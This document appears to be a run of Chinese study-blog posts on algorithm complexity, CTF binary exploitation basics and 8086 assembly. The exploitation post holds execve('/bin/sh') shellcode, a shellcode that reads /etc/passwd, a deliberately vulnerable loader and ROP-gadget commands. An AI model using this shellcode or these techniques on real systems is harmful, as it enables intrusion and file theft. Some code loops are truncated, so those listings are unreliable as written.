其中，数据对象和数据关系的定义用伪代码描述，基本操作的定义格式为

1
2
3

基本操作名(参数表)
初始条件：<初始条件描述>
操作结果：<操作结果描述>

基本操作有两种参数：
赋值参数只为操作提供输入值
引用参数以&打头，出可提供输入值外，还将返回操作结果

复杂度分析

时间复杂度

一般情况下，算法中基本操作重复执行的次数是问题规模n的某个函数f(n)，算法的时间度量记作

1	T(n) = O(f(n))

时间复杂度分析
1）只关注循环执行次数最多的一段代码
2）加法法则：总复杂度等于量级最大的那一段代码的复杂度。例如：
若 T1(n) = O(f(n)), T2(n) = O(g(n))
则 T(n) = T1(n) + T2(n) = max{O(f(n)), O(g(n))} = O(max{f(n),g(n)})
3）乘法法则：嵌套代码的复杂度等于嵌套内外代码复杂度的乘积。例如：
若 T1(n) = O(f(n)), T2(n) = O(g(n))
则 T(n) = T1(n) x T2(n) = O(f(n)) x O(g(n)) = O(f(n) xg(n))
复杂度量级（按数量级递增）

多项式量级	非多项式量级
常量阶O(1)	指数阶O(2^n)
对数阶O(logn)	阶乘阶O(n!)
线性阶O(n)
线性对数阶O(nlogn)
平方阶O(n^2)…k次方阶O(n^k)

当O(m+n)、O(mxn)时
加法法则：T1(m) + T2(n) = T(n) = O(f(n) + g(n))
乘法法则不变

进阶：四个复杂度分析

最坏情况时间复杂度：代码在最坏的情况下执行的时间复杂度
最好情况时间复杂度：代码在最理想的情况下执行的时间复杂度
平均时间复杂度：用代码在所有情况下执行的次数的加权平均值表示
均摊时间复杂度：在代码执行的所有复杂度情况中绝大多数是低级别的复杂度，个别情况是高级别复杂度，且低级别的复杂度与高级别的复杂度发生具有规律性时，可以将个别高级别的复杂度均摊到低级别的复杂度上。基本上均摊结果等于低级别的时间复杂度。
平均时间复杂度举例

//n表示数组array长度
int find(int[] array,int n,int x)
{
int i = 0;
int pos = -1;
for (;i
{
if(array[i]==x){
pos = i;
break;
}
}
return pos;
}

假设要查找的x在数组中与不在数组中的概率都为1/2，另外，要查找的数据出现在0-n-1这n个位置的概率都一样，即1/n，则该例的平均时间复杂度计算方式为

1 2	1x1/2n + 2x1/2n + 3x1/2n + ... + nx1/2n +nx1/2 = (3n+1)/4

由此可见该代码的加权平均时间复杂度为O(n)
均摊时间复杂度举例

//array表示一个长度为n的数组
//代码中的array.length就等于n
int[] array = new int[n];
int count 0;
void insert(int val){
if(count == array.length){
int sum = 0;
for (int i = 0;i
sum = sum + array[i];
}
array[0] = sum;
count = 1;
}
array[count] = val;
++count;
}

在最理想的情况下，数组内有空闲空间，所以最好情况时间复杂度为O(1)，数组长度为n，那么更具数组插入的位置的不同，我们可以分为n种情况；最坏的情况下，数组中没有空闲空间，需要先做一次数组的遍历求和，然后将数组插入，所以最坏情况时间复杂度为O(n)。所以总共有n+1种情况，且发生概率一样，都是1/(n+1)。那么平均时间复杂度的计算方法为

1 2	1x1/(n+1) + 1X1/(n+1) + ... + 1x1/(n+1) + nx1/(n+1) = O(1)

我们可以发现find()函数和insert()函数有很大的差别，find()函数在极端情况下复杂度才为O(1),但insert()函数在大部分情况下复杂度都是O(1)，而且O(1)的插入和O(n)的插入，出现频率是非常有规律的，而且有一定的时序关系，一般都是一个O(n)插入之后，紧跟着n-1个O(1)的插入操作，循环往复。针对如此场景，上述分析的方法被称为：摊还分析法；通过摊还分析法得到的时间复杂度就是均摊时间复杂度。我么可以发现每一次O(n)的插入都会伴随n-1次的O(1)的插入，所以把耗时多的操作均摊到接下来n-1次耗时少的操作上，这就是均摊分析的大致思路

空间复杂度

类似于时间复杂度，空间复杂度作为算法所需存储空间的度量，记作

1	S(n) = O(f(n))

留坑待填

Pwn

2018-09-12T13:26:33.000Z

Basic Knowledge

·Reverse Engineering
·Exploit
·x86 Assembly

·Reverse Engineering
Binary to Source code
通过逆向工程来发现漏洞
静态分析（不运行程序来分析代码）：
工具：
IDA Pro
objdump命令
动态分析（运行程序来分析代码）：
工具：
strace命令（跟踪系统函数调用）usage: strace fileaddress
Itrace命令（跟踪所有库调用, library函数）usage:ltrace fileaddress

·Exploit
Vulnerability to Control flow
利用漏洞攻击取得程序控制权
即pwn
Useful Tools

IDA PRO

GDB

usage: gdb -q ./a.out
            run(r)--运行
            disas function_name--反编译某个function
            break(b) *0x80488014--设置断点
            info b--查看断点
            info r--查看寄存器状态
            ni--next instruction
            si--step into
            backtrace(bt)--显示上一层所有stack frame信息
            continue(c)--继续执行到下一个断点
            x/wx address--查看address中的内容
w可以换成b/h/g分别对应1/2/8 Byte
/后可以接数字，表示一次列出几个
第二个x可以换成u/d/s/i 以不同方式表示
u：unsigned int
d：10进制
s：字符串
i：指令
            set *address = value
将address中的值设置为value，一次设4byte
可以将*换成（char/short/long）分别表示 1/2/8 byte
eg:
set *0x8048a060 = 0xdeadbeef
set {int}0x8048a060 = 1337
set $eax = $edx(寄存器间)
            list--列出源代码
            print val--打印变量值
            info local--显示局部变量
            attach pid--附近加一个正在运行的程序
            可以配合ncat或socat进行exploit的调试
ncat -ve ./a.out -kl 8888
echo 0 > /proc/sys/kernel/yama/ptrace_scope
elfsymbol--查看function的plt，做ROP时特别有用
vmmap--查看process mapping信息，可以看到每个address的权限
readelf--查看section位置
find(alias searchmem)--在内存中查找信息，通常用来搜索字符串（例如：/bin/sh）

Qira
1
usage: qira -s ./filename

Pwntools

Basic structure :
from pwn import *
r = remote('127.0.0.1',4000)  //地址可变，也可以直接是程序名
r.sendline(...)               //传入程序的内容，若传入地址，需写成如：p32(0x111)格式
r.interactive()

Shellcode

·System Call
通过汇编程序来执行系统的命令
EAX: system call number/ return value
EBX,ECX,EDX,ESI,EDI: argument
Instruction: int 0x80
System Call查看网址（Linux）：http://syscalls.kernelgork.com/
Example: execve(“/bin/sh”,NULL,NULL)

x86 Assembly
//该程序实现了execve("/bin/sh",NULL,NULL)//
push 0x0068732f
push 0x6e69622f
mov ebx,esp
mov eax 0xb
mov ecx 0x0     //xor ecx,ecx
mov edx,0x0     //xor edx,edx
int 0x80
//但该程序不是常用的写法，只做试例//

1
2
3
4
5
6
7
8
9
10
11
12
13
//下面是一个常见的写法//
jmp sh
run:
  pop ebx
  mov BYTE [ebx+7],0 //将内存中“/bin/sh”后面一个内存单元设置为0，作为作为该字符串的结束标志
  xor eax,eax
  mov al,11
  xor ecx,ecx
  xor edx,edx
  int 0x80
sh:
  call run
  db "/bin/sh"

使该汇编程序在c中调用

//首先编译上面的汇编程序
·nasm a.asm -o a.o -felf32
//将a.o转化为16进制文件
·objcopy -O binary a.o code
·xxd -i code
·xxd -i code > code.h        //转化为头文件
//编写和运行C文件
·#include "code.h"
 typedef int (*CODE)();      //定义一个返回值为int，不带参数的函数指针
 int main()
 {
 ((CODE)code)();
 }
//编译
·gcc test.c -o test -m32 -zexecstack
//再编写一个程序vul.c，编译一下
·#include
 char code[200];
 typedef int (*CODE)();
  
 int main()
 {
        read(0,code,100);
        ((CODE)code)();
        return 0;
 }
//将scode的输出作为输入传给vul
·(cat scode;cat) | ./vul

在很多时候我们不能直接拿到shell，尤其是在做CTF的时候，Flag会保存在一个文件中，那么此时我们需要：
Open这个文件
Read这个文件
Write这个文件

//写一个OWR的汇编程序（参照上例）
 jmp file 
 open:
 pop ebx
 xor eax,eax
 mov al,5           //open操作
 xor ecx,ecx
 int 0x80

 mov ebx,eax
 mov al,3           //read操作
 mov ecx,esp
 mov dl,0x30
 int 0x80

 mov al,4           //write操作
 mov bl,1
 mov dl,0x30
 int 0x80

 xor eax,eax
 inc eax            //exit操作
 int 0x80

 file:
 call open
 db '/etc/passwd',0x0

然后参照上例操作

Stack Overflow

·又称stack smashing
·利用方式简单，可直接覆盖return address和控制参数

·Return to Text
控制程序的返回地址到原本程序中的函数（代码）
1）例如程序中有类似function：

1 2	system('/bin/sh') execve('/bin/sh',NULL,NULL)

就可以通过地址直接跳转到function
2）如果数据段上是可执行并且位置固定的话，可以先在数据段上写入shellcode，然后再跳转到数据段上执行。

ROP

一种利用现有的程序片段组合出想要的功能的技巧
1）控制ROP行为的code是“Stack上排列的内容”
Gadget：一小段以ret结尾的code
ROP Chain：串联在一起的gadget，组合出需要的功能

Gadget执行完后，还可以继续return
只要在stack上按正确的顺序排列好每个gadget的address和对应的stack frame，就可以执行复杂的功能了
2）使用ROP的关键：
查找gadget
排列gadget
3）ROP类型：
控制寄存器做syscall
使用原有程序里的函数
使用libc里的gadget或者函数（绕过ASLR）

Protection

·一般pwn题会有保护措施如：ASLR,DEP,PIE,StackGuard

·ASLR
地址随机化
每次执行时，stack、heap、library位置都不一样
检查是否开启ASLR：

1	cat /proc/sys/kernel/randomize_va_space

·DEP
数据执行保护，又称NX
可写的不可以执行，可执行的不可写

·PIE
地址无关可执行文件
gcc在默认情况下没有开启，编译时加上-fPIC-pie就可以开启
没开启的情况下程序的data段以及code段会是固定的
一旦开启之后data以及code也会跟着ASLR，因此前面说的ret2text/shellcode没有固定的位置可以跳，就变得困难很多。

·Stack Guard
编译器对stack overflow的一种保护机制
在函数被调用的时候，先在stack上放canary
函数返回前先检查这个值有没有被修改
可以有效地防止缓冲区溢出攻击

如图我们可以看到，在栈中EBP上面有一个canary栈溢出保护，程序在执行返回地址时，会先检查canary的值是否变化，所以若是有栈溢出攻击就会被识别。
因此要绕过Stack Guard保护，可以先把Canary的值提取出来，在栈溢出攻击时保持canary的值不变，由此实现栈溢出

DEP(NX)

1）ROPgadget --binary ./filename //查找文件中的‘pop eax(ebx)(ecx)(edx) ; ret’ ROPgadget --binary filename --opcode cd80c3 ROPgadget --binary rop --only 'int' cd80c3 //int 0x80;ret ROPgadget --binary ./filename --only 'pop|ret' | grep 'eax' //只查找‘pop eax ; ret’ ROPgadget --binary rop --string '/bin/sh' //查找文件里是否有/bin/sh

留坑待填

Assembly language

2018-09-03T11:18:35.000Z

基础知识

·汇编语言的组成（3类指令）

1）汇编指令：有对应的机器码。
2）伪指令：没有对应的机器码，由编译器执行。
3）其他符号：如+、-、*、/等，没有对应的机器码，由编译器执行。

·CPU对存储器的读写

与芯片进行3类信息的交互：
1）存储单元地址。
2）器件选择，读或写命令。
3）读或写的数据。

·外部总线

1）地址总线：N根地址线可以选找2的N次方个内存单元（一个内存单元1byte）。
2）数据总线：宽度为8k的总线一次能传送 k Btye的数据。
3）控制总线：宽度决定CPU对外部期间的控制能力。

·存储器芯片

1）随机存储（RAM）：可读可写，关机数据丢失。
2）只读存储（ROM）：只读，关机数据不丢失。

寄存器

·Registers Architecture(寄存器结构)

register	Accumulator	Counter	Data	Base	Stack Pointer	Stack Base Pointer	Source	Destination
64-bit	RAX	RCX	RDX	RBX	RSP	RBP	RSI	RCI
32-bit	EAX	ECX	EDX	EBX	ESP	EBP	ESI	EDI
16-bit	AX	CX	DX	BX	SP	BP	SI	DI
8-bit	AH/AL	CH/CL	DH/DL	BH/BL

·通用寄存器

1）AX BX CX DX 这四个寄存器存放一般性数据。
2）这四个通用寄存器都可以分为两个八位寄存器使用（参见上表16-bit和8-bit）
其中，低八位构成AL，高八位构成AH。

·几条汇编指令

1）汇编指令举例

汇编指令	控制CPU完成的操作
mov ax,18	AX=18
mov ah,78	AH=78
mov al,8	AL=8
add ax,9	AX+=9
mov ax,bx	AX=BX
mov al,bh	AL=BH
add ax,bx	AX+=BX
add bh,al	BH+=AL

2）注意事项：
16位寄存器中，若是数据值相加超过4位十六进制的数据，则只保存低四位的十六进制数据。
当16位寄存器被用作两个八位寄存器时，若寄存器数据值超过两位十六进制的数据，则只保存低二位的十六进制数据（若是AL寄存器中数据超过内存，高位不是真的被CPU丢失）
指令的两个操作对象的位数应该一致，而：

mov ax,bl
mov bh,ax
mov al,2000（超出范围）
add al,100H（超出范围）

都是错误的指令。

·8086CPU给出物理地址的方法

1）地址加法器采用物理地址 = 段地址x16 + 偏移地址的方法（地址数据用16进制表示）。
2）基础地址 = 段地址 x 16。
3）“段地址x16”实际上表示16进制数左移一位（即二进制数左移4位）。

·段地址

1）“段地址”划分来自CPU，不是内存本身分段。
2）CPU可以用不同的段地址和偏移地址形成同一个物理地址。
3）给定段地址，仅用偏移地址寻址最多可寻64KB个内存单元。

·段寄存器

1）8086CPU有四个段寄存器：CS、DS、SS、ES。
2）CS：代码段寄存器（段地址），IP：指令指针寄存器（偏移地址）。
3）
4）8086CPU工作过程：
从CS:IP之乡的内存单元读取指令，指令进入指令缓冲区；
IP = IP + 所读取的指令长度，从而指向下一条指令；
执行指令。重复以上过程。
5）CPU只认被CS:IP指向的内存单元的内容为指令。

·修改CS、IP的指令

1）同时修改CS、IP的内容：“jmp 段地址：偏移地址”；
2）只修改IP的内容：“jmp 某一合法寄存器”（用寄存器里的值修改IP，eg: jmp ax）。

寄存器（内存访问）

·DS和[address]

1）DS段寄存器通常来存放要访问的数据的段地址。
2）“[]”表示ds中的数据为内存单元的段地址，“[address]”中的“address”表示偏移地址。
3）假设读取10000H单元的内容（字节型数据的传送）：

mov bx,1000H
mov ds,bx
mov al,[0]（使用mov指令将一个内存单元中的(8位)字节数据送入一个8位寄存器中）
ds是段寄存器，不能直接传入1000H，只能用一个寄存器来进行中转。

4）字的传送：
eg:

mov bx,1000H
mov ds,bx
mov ax,[0]      ;1000：0处的(16位)字型数据送入ax
mov [0],cx      ;将cx中的(16位)字数据传送到1000：0处

·mov、add、sub指令

1）这三个指令都带有两个操作对象。
2）以mov为例，mov、add、sub指令可以有以下几种形式：
mov 寄存器，数据
mov 寄存器，寄存器
mov 寄存器，内存单元
mov 内存单元，寄存器
4）但是mov还存在以下四种形式：
mov 段寄存器，寄存器
mov 寄存器，段寄存器
mov 内存单元，段寄存器
mov 段寄存器，内存单元
5）add，sub指令不能对段寄存器进行操作。

·栈

1）栈是一种具有特殊访问方式的存储空间：最后进入这个空间的数据，最先出去（LIFO）。
2）入栈（push）和出栈（pop）都是以字为单位进行的。
3）
4）段寄存器SS：存放栈顶的段地址；寄存器SP：存放栈顶的偏移地址；任意时刻，SS:SP指向栈顶元素。
5）栈空，SS:SP指向栈空间最高地址单元的下一个单元。
6）一个数据出栈后，该地址单元的数据依然存在，只是不在栈中，当下次有数据入栈时，它将被覆盖。
7）8086CPU不保证对栈操作是否超界，栈顶超界将会覆盖栈外数据。

·push和pop指令

1）push指令和pop指令格式有如下形式（以push为例）：
push 寄存器
push 段寄存器
push 内存单元
2）push指令执行步骤：（1）SP=SP-2；（2）向SS:SP指向的字单元送入数据。
3）pop指令执行步骤：（1）从SS:SP指向的字单元读取数据（2）SP=SP+2。
4）push和pop指令中修改的只是SP，所以栈顶的变化范围最大为：0-FFFFH。

·段的综述

1）将一段连续的内存定义为一个段，用段地址指示段，偏移地址访问段内单元，数据段、代码段、栈段都是我们自己定义的。
2）数据段：段地址存放在DS中，用mov,add,sub等访问内存单元的指令时，CPU数据段的内容当作数据访问。
3）代码段：段地址存放在CS中，段中第一条指令的偏移地址放在IP中，CPU就执行代码段中的指令。
4）栈段：段地址存放在SS中，栈顶单元的偏移地址放在SP中，CPU执行栈操作时将我们定义的栈段当作占空间来用。
5）同一段内存，同时可以是代码段、栈段和数据段，也可以什么都不是，关键在于CS、IP、SS、SP、DS的指向。

初识汇编程序

·3个伪指令

1）segment和ends伪指令：这是一对成对使用的伪指令，作用是定义一个段，其格式为：

1
2
3

段名 segment    ；段从此处开始
    :
段名 ends       ；段到此处结束

2）程序是由多个段组成的，指令、数据、栈被划分到了不同的段中。
3）end：汇编程序结束标记。
4）assume：假设某一段寄存器和程序中的某一个用segment…ends定义的段相关联，例如：
assume cs: 代码段的名字将一个代码段和CS寄存器联系起来。

·程序返回

1）指令：
mov ax,4c00H
int 21H

[BX]和loop指令

·约定两个符号

1）“（）”：表示一个寄存器或者内存单元里的内容。
2）“idata”：表示常量。

·[BX]

1）同[0]一样，[bx]也表示一个内存单元，只是它的偏移地址在bx中。
2）bx中存放的数据作为一个偏移地址EA，段地址SA默认在ds中。

·Loop指令

1）loop指令格式：loop 标号；通常用loop指令来实现循环功能，cx中存放循环次数。
2）eg:

   mov ax,2
   mov cx,11
s: add ax,ax
   loop s
   mov ax,4c00h
   int 21h

3）标号代表一个地址，如上例s标识了一个地址，这个地址处有一条指令：add ax,ax.
4）CPU执行 loop s 的时候，进行两步操作：
（1）（cx）=（cx）- 1
（2）判断cx中的值，不为0则转至标号s所标识的地址处执行，如果为零则执行下一条指令。

·汇编程序中的一些小变动

1）用一个长度位1字节地内存单元向16位寄存器赋值（如把ffff:0006单元给ax赋值），则应该另令(ah)=0,(al)=(ffff6H)。
2）在汇编程序中，数据不能以字母开头，例如代码中mov ax,0ffffh，不能写成mov ax,ffffh。
3）汇编程序中，指令“mov ax,[0]”被当作“mov ax,0”处理，因此有如下两种方法实现将内存单元中的数据送入寄存器（举例说明）：

1
2
3

mov al,ds:[0]
mov al,[bx]
mov al,ds:[bx]

·段前缀

1）出现在访问内存单元的指令中，用于显式地指明内存单元的段地址，形如“mov al,ds:[bx]”，在汇编语言中称为段前缀。
2）将一段内存单元的数据复制到另一段单元中，显式使用段前缀，可以提高程序效率。

包含多个段的程序

·在代码段中使用数据

1）end的另一作用：指明编译器程序入口，用法：end 标号
2）在代码段中使用数据可以使用如下程序框架：

assume cs:code
code segment
        :
        :
        数据
        :
        :
start:
        :
        :
        代码
        :
        :
code ends
end start

来指明CPU从何处开始执行程序。

·在代码段中使用栈

1）在代码段中使用栈挥着数据实质上都是开辟空间。
2）在代码段中使用栈可以使用如下程序框架：

assume cs:code
code segment
        :
        :
        数据
        栈空间
        :
        :
start:
        :
        :
        代码
        :
        :
code ends
end start

来指明CPU从何处开始执行程序。

·将数据、代码、栈放入不同的段

1）定义多个段。eg：

1	assume cs:code,ds:data,ss:stack

2）对段地址的引用：段名就相当于标号，它代表了段地址。eg:

1	mov ax,data ;将名称为“data”的段地址送入ax。

3）

更灵活的定位内存地址的方法

·and和or指令

1）and指令：逻辑与指令，按位进行与运算。该指令可以将操作对象的相应位设为0，其他位不变。
2）or指令：逻辑或指令，按位进行或运算。该指令可以将操作对象的相应位设为1，其他未不变。
3）eg:

mov al,01100011B
and al,00111011B    执行后al=00100011B

mov al,01100011B
or  al,00111011B    执行后al=01111011B

·以字符形式给出的数据

1）用’……’的方式指明数据是以字符的形式给出的，编译器将其转化为ASCII码。
2）eg:

1 2	db 'unIX' ；相当于“db 75H,6EH,49H,58H” mov al,'a' ；相当于“mov al,61H”

·大小写转换问题

1）除了大写字母=小写字母-20H外，可以用and 11011111B将小写转换为大写字母。
2）可用or 01100000B将大写转换为小写字母。

·[bx+idata]

1）[bx+idata]表示一个偏移地址为(bx)+idata的内存单元。
2）常用格式：

mov ax,[bx+idata]
mov ax,[idata+bx]
mov ax,idata[bx]
mov ax,[bx].idata

3）[bx+idata]的方式处理数组更加便利。与C语言比较：
C语言：a[i],b[i]
汇编语言：0[bx],5[bx]

·SI和DI

1）si和di是8086CPU中和bx功能相近的寄存器，si和di不能分成两个8位寄存器来使用。
2）复制字符串汇编程序举例：

·[bx+si]和[bx+di]

1）[bx+si]和[bx+di]含义相似，以[bx+si]为例，其表示一个偏移地址位(bx)+(si)的内存单元。

·[bx+si+idata]和[bx+di+idata]

1）[bx+si+idata]和[bx+di+idata]含义相似，以[bx+si+idata]为例，其表示一个偏移地址位(bx)+(si)+idata的内存单元。
2）常用格式：

mov ax,[bx+idata+si]
mov ax,[idata+bx+si]
mov ax,idata[bx][si]
mov ax,[bx].idata[si]
mov ax,[bx][si].200

数据的位置和长度

·约定两个描述性符号

1）reg：寄存器
2）sreg：段寄存器

·bx、si、di、bp

1）在8086CPU中只有这四个寄存器可以用在“[…]”中来进行内存单元的寻址。
2）在“[…]”中，这四个寄存器可以单个出现，或只能以4种组合出现：bx和si、bx和di、bp和si、bp和di。
3）在“[…]”中使用寄存器bp，且指令中没有显性地给出段地址，则段地址默认在ss中。

·寻址方式

1）

·数据的长度

1）通过寄存器名指明处理数据的尺寸。
eg:

1 2	mov ax 1 ;字操作 mox al,bl ;字节操作

2）在没有寄存器名存在的情况下，用操作符X ptr指明内存单元的长度，X在汇编指令中可以为word或byte。
eg:

1 2	mov word ptr ds:[0],1 ;指明指令访问的内存单元是一个字单元 add byte ptr [bx],2 ;指明指令访问的内存单元是一个字节单元

·div指令

1）div是除法指令。需要注意以下问题：
（1）除数：有8位和16位两种，在一个reg或内存单元中；
（2）被除数：默认放在AX或DX和AX中，除数为8位，被除数则为16位，默认在AX中存放；除数为16位，被除数则为32位，DX存放高16位，AX存放低16位。
（3）除数为8位，AL存储商，AH存储余数；除数为16位，AX存储商，DX存储余数。
2）格式：div reg或者div 内存单元。

·伪指令db、dw、dd

1）db: define btye
2）dw: define word
3）dd: define double word（双字型数据，占两个字）

·dup

1）dup操作符的作用：进行数据重复。
2）用法：
db 3 dup (0) ;定义了三个值都是0字节
db 3 dup (0,1,2) ;定义了九个字节，他们是0、1、2、0、1、2、0、1、2

转移指令的原理

·转移指令

1）可以修改IP，或同时修改CS、IP的指令统称为转移指令。即控制CPU执行内存中某处代码的指令。
2）段内转移：只修改IP，比如：jmp 1000:0。
3）段内转移分为短转移（IP的修改范围为-128~127）、近转移（IP的修改范围为-32768~32767）。
4）8086CPU的转移指令分为如下几类：
无条件指令转移（如：jmp）
条件转移指令
循环指令（如：loop）
过程
中断

·操作符offset

1）offset是由编译器处理的符号，功能是取得标号的偏移地址。
2）

·依据位移指令进行转移的jmp指令

1）jmp short 标号（段内短转移，转到标号处执行指令）实现功能是：(IP)=(IP)+8位位移。
2）CPU在执行jmp指令的时候并不需要转移目的地址，而是包含转移的位移。
3）
4）jmp near ptr 标号（段内近转移）实现功能是：(IP)=(IP)+16位位移。

·转移的目的地址在指令中的jmp指令

1）“jmp far ptr 标号”实现段间转移，far ptr指明了指令用标号的段地址和偏移地址修改CS和IP。

·转移地址在寄存器中的jmp指令

1）指令格式：jmp 16位reg，功能：(IP)=(16位reg)。eg: jmp ax。

·转移地址在内存中的jmp指令

1）jmp word ptr 内存单元地址（段内转移）
功能：从内存单元地址处开始存放一个字，是转移的目的偏移地址。eg：jmp word ptr ds:[0]
2）jmp dword ptr 内存单元地址（段间转移）
功能：从内存单元地址处开始存放两个字，高地址处的字是转移的目的段地址，低地址处是转移的目的偏移地址。
eg：jmp dword ptr ds:[0]

·jcxz指令

1）jcxz指令为有条件转移指令，所有的有条件转移指令都是短转移。
2）“jcxz 标号”的功能相当于：if((cx)==0) jmp short 标号。（判断语句）

·loop指令

1）所有的循环指令都是短转移。
2）“loop 标号”的功能相当于：(cx)—; if((cx)!=0) jmp short 标号（do while循环）

·注意

1）在之前jmp指令中，“jmp 2000：0100”的转移指令，是在Debug中使用汇编指令，汇编编译器并不认识。

CALL和RET指令

·ret和retf

1）ret指令用栈中的数据，修改IP的内容，实现近转移；ret指令实现下面两步操作：

1 2	(IP)=((ss)*16+(sp)) (sp)=(sp)+2

相当于进行：pop IP

2）retf指令用栈中的数据，修改CS和IP的内容，实现远转移；retf指令实现4步操作：

(IP)=((ss)*16+(sp))
(sp)=(sp)+2
(CS)=((ss)*16+(sp))
(sp)=(sp)+2

相当于进行：pop IP pop CS

·call指令

1）执行call指令时，先将当前IP或CS和IP压入栈中，再进行转移。
2）call指令不能实现短转移。

·根据位移进行转移的call指令

1）call 标号（将当前的IP压栈后，转到标号处执行指令）。
2）CPU执行“call 标号”时，相当于进行：

1 2	push IP jmp near ptr 标号

·转移的目的地址在指令中的call指令

1）call far ptr 标号（实现段间转移）。
2）CPU执行“call far ptr 标号”时，相当于进行：

1
2
3

push CS
push IP
jmp far ptr 标号

·转移地址在寄存器中的call指令

1）call 16位reg。
2）CPU执行“call 16位reg”时，相当于进行：

1 2	push IP jmp 16位reg

·转移地址在内存中的call指令

1）call word ptr 内存单元地址
2）CPU执行“call word ptr 内存单元地址”时，相当于进行：
push IP
jmp word ptr 内存单元地址
3）call dword ptr 内存单元地址
4）CPU执行“call dword ptr 内存单元地址”时，相当于进行：

1
2
3

push CS
push IP
jmp dword ptr 内存单元地址

·call和ret配合使用

1）实现子程序（函数）的机制，框架如下：

1
2
3

标号：
   指令
   ret

2）当往子程序（函数）传参时，常用的方法是用栈传递参数；传字符串时，将首地址存放在寄存器中传递给子程序。
3）在子程序（函数）中用到相同的寄存器时，一般把子程序中的寄存器中的值在子程序开始时存入栈中，在子程序返回前把值出栈给相应寄存器。

·mul指令

1）mul乘法指令，需要注意以下两点：
（1）相乘的两个数位必须一样（8位和8位相乘），如果是8位，一个默认在AL存放，另一个存放在8位reg或内存字节单元中；如果是16位，一个默认存在AX中，另一个放在16位reg或内存字单元中。
（2）结果：如果是8位乘法，结果默认放在AX中；如果是16位乘法，结果高位默认存放在DX中，低位在AX中存放。
2）格式：mul reg；mul 内存单元（内存单元可以用不同的寻址方式给出）。
eg：

1
2
3

mov ax,1000
mov bx,10000
mul bx

标志寄存器

·概述

1）作用：
用来存储相关指令的某些执行结果；
用来为CPU执行相关指令提供行为依据；
用来控制CPU的相关指令工作方式；
2）标志寄存器（flag寄存器）按位起作用：

3）flag中空位没有使用。

·ZF标志

1）ZF，零标志位。它记录相关指令执行后结果是否为零。结果为零，zf=1；反之，zf=0。
2）在8086CPU中一般运算指令如add、sub、and等的执行会影响标志寄存器，而传送寄存器如mov、push、pop大都对标志寄存器没有影响。

·PF标志

1）PF，奇偶标志位。它记录相关指令执行后结果所有bit位中1的个数是否为偶数。偶数pf=1；反之pf=0。

·SF标志

1）SF，符号标志位。它记录相关指令执行后记过是否为负。结果为负，sf=1；反之，sf=0。
2）当我们把数据当作有符号数来运算时，可以通过sf判断结果正负；若把数据当作无符号数来运算，sf的值没有意义，虽然相关指令影响了它的值。

·CF标志

1）CF，进位标志位。在进行无符号数运算时，它记录运算结果的最高有效位向更高位的进位值，或从更高位的借位值。进位或借位cf=1。
2）eg：

mov al,98H
add al,al    ;执行后：(al)=30H,CF=1,CF记录了从最高有效位向更高位的进位值。
mov al,97H
sub al,98H   ;执行后：(al)=FFH,CF=1,CF记录了向更高位的借位值。

·OF标志

1）OF，溢出标志位。记录有符号数运算结果是否发生了溢出。如果溢出，of=1；反之，of=0。

adc指令

1）adc是带进位加法指令，它利用了CF位上的进位值。
2）指令格式：adc 操作对象1，操作对象2
3）功能：操作对象1 = 操作对象1 + 操作对象2 + CF
eg:

1	adc ax,bx实现：(ax)=(ax)+(bx)+CF

相当于：低位相加，高位相加再加上低位相加产生的进位值。
4）adc指令执行后也可能产生进位值。

·sbb指令

1）sbb是带借位减法指令，它利用了CF位上的进位值。
2）指令格式：sbb 操作对象1，操作对象2
3）功能：操作对象1 = 操作对象1 - 操作对象2 - CF
eg:

1	sbb ax,bx实现：(ax)=(ax)-(bx)-CF

·cmp指令

1）cmp是比较指令，功能相当于减法指令，但是不保存结果。
2）格式：cmp 操作对象1，操作对象2
3）cmp指令可以对无符号数间和有符号数间进行比较。
4）以cmp ah,bh为例，总结CPU在执行cmp指令后，sf和of的值是如何说明比较结果的：
（1）如果sf=1，而of=0；所以(ah)<(bh)。
（2）如果sf=1，而of=1；所以(ah)>(bh)。
（3）如果sf=0，而of=1；所以(ah)<(bh)。
（4）如果sf=0，而of=0；所以(ah)>=(bh)。

·检测比较结果的条件转移指令

1）无符号数（检测zf，cf的值）：

2）将cmp和je等指令配合使用，与高级语言中的if语句相似。
eg:

cmp ah,bh
je s
add ah,bh
jmp short ok
s:add ah,ah
ok:...

·DF标志和传送指令

1）DF，方向标志位。在串处理指令中，控制每次操作后si，di的增减。（df=0，每次操作后si、di递增；df=1，每次操作后si、di递减）。
2）一个串传送指令格式：
movsb（传送内存单元中的字节到es:di，然后根据标志寄存器df位的值，将si、di递增或递减）
movsw（传送内存单元中的字到es:di，然后根据标志寄存器df位的值，将si、di递增2或递减2）
3）配合rep使用（rep，根据cx值重复执行后面的串传送指令。）rep movsb可以循环实现(cx)个字符的传送。
4）8086CPU提供两个指令对df位进行修改：
cld指令：将df位置0
std指令：将df位置1

·pushf和popf

1）pushf：将标志寄存器的值压栈；popf：从栈中弹出数据，送入标志寄存器中。

·标志寄存器在Debug中的表示

1）